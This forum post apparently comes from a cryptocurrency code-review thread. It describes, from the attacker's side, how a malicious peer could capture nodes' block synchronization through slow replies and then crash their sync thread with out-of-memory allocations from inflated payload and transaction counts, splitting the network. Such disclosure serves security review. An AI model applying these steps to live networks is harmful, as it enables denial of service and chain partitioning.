Ok, another attack vector, but this time, it'll take it's sweet time to do it
We setup a hallmarked server and wait for a getCumulativeDifficulty request...
When we get one, we answer with a higher value than is currently possible, so that the other client gets interested in our blocks.
We send the list of milestone blocks and block ids in a way that the commonBlockIdis one of the most recent blocks the client has. (But that step is just for giggles
)
He'll ask us then for our nextBlocks, and we take our sweet time (what's the timeout? 5s?) and then send a big bunch of... well, no, we just send a single block. a bogus one, the block isn't checked at that point, it's just put into futureBlocks. Then the client asks us again for nextBlocks and we repeat the same procedure.
We now have a low bandwidth "permanent" connection with the client. The client will not start another getCumulativeDifficulty request, because that starts only a second after our "captured" thread ends... So the ways for a client to receive a new block from the network are limited to 2 ways:
- via a processBlock call coming in from another peer
- via us, because if we send a block that appends nicely onto the client's last block (which he already told us by giving us his commonBlockId), that will just get added after being checked
That means: Clients without hallmarks or behind firewalls can only get new blocks from us.
Now we have to do something to interfere with the other hallmarked servers... they still have the possibility to get a block thru another peer's processBlock call.
However, that call has a flaw (which I already outlined a few days ago), in that it only accepts blocks that nicely fit onto the current blockchain.
So we have the block generation of the non-hallmarked part of the network completely under our control and the rest of the network can't resolve forks anymore, because every block that comes thru processBlock (or us) and fits, is kept. So after a while, the network will nicely diverge and we can send everyone a block that possibly fits onto his blockchain, because if it fits, the client will take it, if it doesn't fit, it just gets added to futureBlocks.
Now suppose, we have to shutdown our server, or the required bandwidth is a bit on the high side and we want to get rid of a few nodes without them being able to get back to a proper chain...
The thread that does the blockchain scanning is started with scheduleWithFixedDelay. Let's get the JDK description of that function:
Creates and executes a periodic action that becomes enabled first after the given initial delay, and subsequently with the given delay between the termination of one execution and the commencement of the next. If any execution of the task encounters an exception, subsequent executions are suppressed.
Aha! we can kill the thread for good, if we cause an exception! (and we only kill that blockchain getting thread, the other ones will still be alive)
well, there is a big try {...}catch(Exception e){} around it, so what could we possibly use? Well, how about something that can't be catched... Who watched the thread closely?
I mentioned it before...
An OutOfMemoryError. This is an uncatchable exception and will cause the thread to die and no-one will start it again.
So let's see where we can generate that...
If we give a client a block that fits onto it's blockchain [if(block.previousBlock==lastBlock)], we directly allocate [ByteBuffer.allocate(BLOCK_HEADER_LENGTH+block.payloadLength);], so we just make sure that our payloadLength is set to INT_MAX-BLOCK_HEADER_LENGTH and the client will very likely fail because it can't find 2GB of contiguous memory anywhere within the JVM. But you might say: If someone started the server with a lot more ram!
Well, actually, there's a second way, also outlined by me a few pages earlier: you have to generate a proper looking block that just has the number of transactions modified, because that is also used for an allocation without a prior sanity check. So you can allocate 16GB of contiguous memory, which with near certainty will fail on any current server, no matter how the JVM is setup.
So if we wait long enough, we can take over the block distribution of the network with minimal ressources, because as soon as a peer asks us only once for blocks, we've got him hooked. and at that point, the network can't deal with forks anymore, which happen quite often, but it still looks ok on first sight, because we can feed all clients with some nice looking blocks from each other, so groups of clients will be in the same blockchain but there will be many blockchains existing in parallel.
And if we do that long enough, they won't find to gether again even if we're gone because they only sync 720 blocks back.
That's quite a nice attack, right? No spamming, no DOSing, not even too visible,
Did I forget anything?